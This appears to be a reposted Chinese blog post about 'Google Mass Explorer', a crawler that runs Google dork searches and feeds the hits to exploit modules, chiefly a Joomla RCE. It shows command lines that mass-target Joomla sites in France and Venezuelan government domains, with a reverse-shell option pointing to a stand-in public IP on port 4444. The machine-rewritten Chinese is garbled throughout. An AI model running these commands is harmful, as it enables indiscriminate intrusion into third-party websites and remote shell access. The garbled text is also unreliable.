好用的Google缝隙爬虫:Google Mass Explorer

访客5年前黑客工具1290


这是一款根据谷歌搜索引擎的自动化爬虫。
爬虫介绍
爬虫大体机制便是:
先进行一次谷歌搜索,将成果解析为特定格局,然后再提供给exp运用。
我们能够测验运用–help来列出一切参数。
这个项目笔者会持续更新,今后再增加新的exp进行晋级。此外,它会运用google_parsers模块去构建exp解析搜索成果,所以当你开端搜索时,能够挑选“–exploit parser”参数来指定相应exp。
google parsers模块(google_parsers.py)今后还会持续优化,而现在的exp只含有joomla cve,究竟这个项目首要是给我们自己diy运用的。可是,假如你不会弄exp,把运用exp提交给过来也行。
因为笔者平常仍是比较忙,所以没有太多时刻去手动搜索方针。故而,笔者测验运用Selenium框架去造了个爬虫来查找测验方针。至于搜索过程中呈现的Google的验证码,它需求其他库和模块来辅佐处理。在项目里运用Selenium后,我们就能够在谷歌呈现验证码的是时分,自行手动输入验证码,然后爬虫就能够持续爬行了。这大概是笔者能想出的更好的处理验证码防护的办法了。
简略概述下爬虫是怎么作业的:
1. 履行谷歌搜索
2. 从每一页解析成果
3. 测验是否成果中含有缝隙
依靠与需求
这个项目需求python3,运用requirements装置依靠库的办法如下:
$ sudo pip install -r requirements.txt
运转示例:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2019_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
在上面的比方里,笔者是在寻觅法国的joomla RCE方针,运用的是google_domains.txt里边的google域名(比方google.co.uk)来作为搜索引擎,“–last_update”则代表着搜索成果的更新时刻为上个月。
上面比方里的选项适用于任何言语,首要决定于google针对相应的国家给出的语法。
下面再给出一个简略的比方:
python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
当然,这些exp也是能够独自运用的:
$ cd xpl_parsers
$ python joomla_cve_2019_8562.py
独自测验exp的办法:
$ cd exploits
$ python exploiter.py --file
 

相关文章

HTML5:<a>的ping特点之逝世ping与隐私追寻

在HTML5中 标签参加了一个新的特点ping。规划者参加它的理由是, Ping能够使浏览器对外发送一个异步恳求,一般用来广告的追寻、点击率计算或完结一次HTTP重定向。 可是听到监督、追寻这个词,...

Chafer运用的新的根据Python的有效载荷MechaFlounder

2019年11月,Chafer要挟小组针对土耳其政府从头运用他们在2019年早些时候运用的基础设施(Clearsky报导的活动中),特别是域名win10-update [.] com。尽管咱们没有见到...

看我怎么发现比特币赌博网站缝隙并收成$12000赏金

Web浸透测验中比较难的便是测验那些交互较少的使用了,当你尝试了各种缝隙使用办法而无效之后,很或许就会抛弃了。但有时分,这种花费时刻的投入和研讨,对白帽本身的技能进步来说,仍是十分有用的。这儿我就共...

怎么使用神经网络和Python生成指定形式的暗码

今日给咱们介绍的是Github上一个名叫PyMLProjects的项目,这个项意图意图是为了练习AI来学习人类结构暗码的形式,然后咱们就可以用AI来生成许多同一形式或品种的暗码了。这种办法或许可以用...

针对非Webapp测验的Burp技巧(二):扫描、重放

在本系列连载的第一节中,笔者谈到了关于burp对非webapp的功用测验。原本我只想写点东西共享出来,并没想到会扯出那么多。现在嘛,我还会持续写下去。 在这一节中,我会讲一讲: Target >...

深化了解Json Web Token之实战篇

原本想用python DRF 的 JWT做,后来各种失利。终究尝试了用Php,发现十分便当。 PHP 版别 PHP 7.2.4-1+b2 (cli),也便是kali linux自带的php,至于com...